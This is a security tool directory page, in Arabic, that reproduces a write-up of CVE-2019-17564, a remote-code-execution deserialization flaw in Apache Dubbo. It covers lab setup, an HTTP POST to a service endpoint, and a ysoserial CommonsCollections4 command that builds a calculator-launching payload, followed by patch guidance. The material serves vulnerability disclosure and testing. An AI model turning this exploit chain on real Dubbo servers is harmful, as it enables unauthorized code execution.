Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-17564 — CVE-2019-17564:ثغرة إلغاء التسلسل في Apache Dubbo | Kitploit
أدوات/GitHubGitHub/fairyming/cve-2019-17564
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأداة الوصول عن بعدتطوير الحمولات
GitHubfairyming/cve-2019-17564

CVE-2019-17564

CVE-2019-17564:ثغرة إلغاء التسلسل في Apache Dubbo

عرض المستودع
851منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-17564: ثغرة إلغاء تسلسل Apache Dubbo

0x00 مقدمة

Apache Dubbo هو إطار عمل RPC عالي الأداء وخفيف الوزن ومفتوح المصدر بلغة جافا، يوفر ثلاث قدرات أساسية: استدعاء الطرق عن بُعد الموجهة للواجهة، والتسامح الذكي مع الأخطاء وتوازن الحمل، والتسجيل والاكتشاف التلقائي للخدمات.

0x01 نظرة عامة على الثغرة

يدعم Apache Dubbo بروتوكولات متعددة، ويوصى رسميًا باستخدام بروتوكول Dubbo. ثغرة إلغاء تسلسل في بروتوكول HTTP الخاص بـ Apache Dubbo (CVE-2019-17564)، يعود السبب الرئيسي لهذه الثغرة إلى أنه عند تمكين بروتوكول HTTP في Apache Dubbo، فإن معالجة غير مناسبة لجسم الرسالة تؤدي إلى إلغاء تسلسل غير آمن، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد في حال وجود أدوات قطع قابلة للاستخدام في حزمة المشروع.

0x02 الإصدارات المتأثرة

2.7.0 <= Apache Dubbo <= 2.7.4.1 2.6.0 <= Apache Dubbo <= 2.6.7 Apache Dubbo = 2.5.x

0x03 إعداد البيئة

  1. نظرًا لأن تشغيل dubbo يعتمد على zookeeper، لذلك قم أولاً بتثبيت zookeeper
root@kitploit:~
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
# قم بإعادة تسمية zoo_sample.cfg في دليل conf إلى zoo.cfg
mv zoo_sample.cfg zoo.cfg
# انتقل إلى دليل bin وقم بتشغيل zookeeper
./zkServer.sh start

WX20200222-171524@2x.png

  1. احصل على مشروع dubbo من GitHub وقم بتعديل pom.xml
root@kitploit:~
git clone https://github.com/apache/dubbo-samples
# انتقل إلى دليل dubbo-samples-http وقم بتعديل pom.xml
vim pom.xml

قم بتعديل إصدار dubbo إلى إصدار به ثغرة WX20200222-172028@2x.png أضف تبعية، واستورد أداة قطع قابلة للتفعيل، هنا نستورد commons-collections4-4.0

root@kitploit:~
<dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-collections4</artifactId>
        <version>4.0</version>
    </dependency>

WX20200222-172346@2x.png

  1. بناء باستخدام mvn، وتشغيل dubbo
root@kitploit:~
mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java

WX20200222-172721@2x.png

0x04 استغلال الثغرة

الحمولة

root@kitploit:~
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: 127.0.0.1:8080

paylaod

هنا نستخدم ysoserial لإنشاء الحمولة

root@kitploit:~
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser

إرسال الحزمة عبر bp WX20200222-173202@2x.png

0x05 طريقة الإصلاح

  1. تعطيل بروتوكول HTTP
  2. الترقية الفورية إلى الإصدار 2.7.5 أو أعلى، الرابط ذو الصلة: https://github.com/apache/dubbo/releases/tag/dubbo-2.7.5

الروابط المرجعية:

https://www.mail-archive.com/[email protected]/msg06225.html

تنزيل الأداة